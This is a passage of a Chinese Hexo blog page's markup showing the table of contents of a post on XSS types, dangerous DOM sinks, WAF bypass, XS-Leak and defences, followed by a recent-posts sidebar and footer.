class="toc-text">1. 反射型 XSS (Reflected XSS)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E5%AD%98%E5%82%A8%E5%9E%8B-XSS-Stored-XSS"><span class="toc-number">2.2.</span> <span class="toc-text">2. 存储型 XSS (Stored XSS)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E5%9F%BA%E4%BA%8E-DOM-%E7%9A%84-XSS-DOM-based-XSS"><span class="toc-number">2.3.</span> <span class="toc-text">3. 基于 DOM 的 XSS (DOM-based XSS)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1-innerHTML-%E5%86%85%E9%83%A8-HTML"><span class="toc-number">2.4.</span> <span class="toc-text">1. innerHTML (内部 HTML)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-outerHTML-%E5%A4%96%E9%83%A8-HTML"><span class="toc-number">2.5.</span> <span class="toc-text">2. outerHTML (外部 HTML)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-document-write-%E6%96%87%E6%A1%A3%E5%86%99%E5%85%A5"><span class="toc-number">2.6.</span> <span class="toc-text">3. document.write() (文档写入)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%B8%BA%E4%BB%80%E4%B9%88%E5%AE%83%E4%BB%AC%E6%98%AF-XSS-%E7%9A%84%E2%80%9C%E9%87%8D%E7%81%BE%E5%8C%BA%E2%80%9D%EF%BC%9F"><span class="toc-number">2.7.</span> <span class="toc-text">为什么它们是 XSS 的“重灾区”？</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%89%E5%85%A8%E5%BC%80%E5%8F%91%E8%A7%84%E8%8C%83-%E9%98%B2%E5%BE%A1%E6%96%B9%E6%A1%88"><span class="toc-number">2.8.</span> <span class="toc-text">安全开发规范 (防御方案)</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-%E6%89%A7%E8%A1%8C%E5%AD%97%E7%AC%A6%E4%B8%B2%E4%BB%A3%E7%A0%81%EF%BC%9Aeval-setTimeout-setInterval"><span class="toc-number">2.9.</span> <span class="toc-text">4. 执行字符串代码：eval(), setTimeout(), setInterval()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-%E5%8A%A8%E6%80%81%E8%AE%BE%E7%BD%AE%E5%B1%9E%E6%80%A7%EF%BC%9Alocation-href-onclick-onerror"><span class="toc-number">2.10.</span> <span class="toc-text">5. 动态设置属性：location.href, onclick, onerror</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89%E3%80%81-WAF-%E7%BB%95%E8%BF%87%E6%8A%80%E6%9C%AF"><span class="toc-number">3.</span> <span class="toc-text">三、 WAF 绕过技术</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E5%B8%B8%E8%A7%81%E8%A7%A6%E5%8F%91%E5%90%91%E9%87%8F%E4%B8%8E%E6%A0%87%E7%AD%BE%E6%9B%BF%E6%8D%A2"><span class="toc-number">3.1.</span> <span class="toc-text">1. 常见触发向量与标签替换</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E7%BC%96%E7%A0%81%E7%BB%95%E8%BF%87%E6%8A%80%E6%9C%AF"><span class="toc-number">3.2.</span> <span class="toc-text">2. 编码绕过技术</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E8%AF%AD%E6%B3%95%E7%B3%96%E4%B8%8E%E7%BB%93%E6%9E%84%E7%BB%95%E8%BF%87"><span class="toc-number">3.3.</span> <span class="toc-text">3. 语法糖与结构绕过</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9B%9B-XS-Leak-%E8%B7%A8%E7%AB%99%E6%B3%84%E6%BC%8F"><span class="toc-number">4.</span> <span class="toc-text">四 XS-Leak (跨站泄漏)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-XS-Leak-%E5%8E%9F%E7%90%86"><span class="toc-number">4.1.</span> <span class="toc-text">1. XS-Leak 原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E7%BB%8F%E5%85%B8%E6%8E%A2%E6%B5%8B%E5%90%91%E9%87%8F-Vectors"><span class="toc-number">4.2.</span> <span class="toc-text">2. 经典探测向量 (Vectors)</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%94%E3%80%81-XSS-%E5%B7%A5%E7%A8%8B%E5%8C%96%E9%98%B2%E5%BE%A1%E4%BD%93%E7%B3%BB"><span class="toc-number">5.</span> <span class="toc-text">五、 XSS 工程化防御体系</span></a></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2026/03/05/%E5%85%B3%E4%BA%8Exss/" title="关于xss">关于xss</a><time datetime="2026-03-05T13:00:00.000Z" title="发表于 2026-03-05 21:00:00">2026-03-05</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2026/03/03/npm%E4%BD%BF%E7%94%A8%E5%92%8Cvm%E6%B2%99%E7%AE%B1/" title="npm使用和vm沙箱">npm使用和vm沙箱</a><time datetime="2026-03-03T05:00:00.000Z" title="发表于 2026-03-03 13:00:00">2026-03-03</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2026/03/02/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/" title="计算机网络">计算机网络</a><time datetime="2026-03-02T12:00:00.000Z" title="发表于 2026-03-02 20:00:00">2026-03-02</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2026/03/01/Hgamectf/" title="Hgamectf">Hgamectf</a><time datetime="2026-03-01T13:00:00.000Z" title="发表于 2026-03-01 21:00:00">2026-03-01</time></div></div><div class="aside-list-item no-cover"><div class="content"><a class="title" href="/2026/02/27/docker/" title="docker">docker</a><time datetime="2026-02-27T13:00:00.000Z" title="发表于 2026-02-27 21:00:00">2026-02-27</time></div></div></div></div></div></div></main><footer id="footer"><div class="footer-other"><div class="footer-copyright"><span class="copyright">&copy;&nbsp;2025 - 2026 By xiexie</span><span class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo 8.1.1</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly 5.5.3</a></span></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="translateLink" type="button" title="简繁转换">繁</button><button id="darkmode" type="button" title="日间和夜间模式切换"><i class="fas fa-adjust"></i></button><button id="hide-aside-btn" type="button" title="单栏和双栏切换"><i class="fas fa-arrows-alt-h"></i></button></div><div id="rightside-config-show"><button id="rightside-config" type="button" title="设置"><i class="fas fa-cog fa-spin"></i></button><button class="close" id="mobile-toc-button" type="button" title="目录"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="回到顶部"><span class="scroll-percent"></span><i class="fas fa-arrow-up"></i></button></div></div><div><script src="/js/utils.js?v=5.5.3"></script><script src="/js/main.js?v=5.5.3"></script><script src="/js/tw_cn.js?v=5.5.3"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui@6.1.7/dist/fancybox/fancybox.umd.min.js"></script><script src="https://cdn.jsdelivr.net/npm/vanilla-lazyload@19.1.3/dist/lazyload.iife.min.js"></script><script src="https://cdn.jsdelivr.net/npm/node-snackbar@0.1.16/dist/snackbar.min.js"></script><div class="js-pjax"></div><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>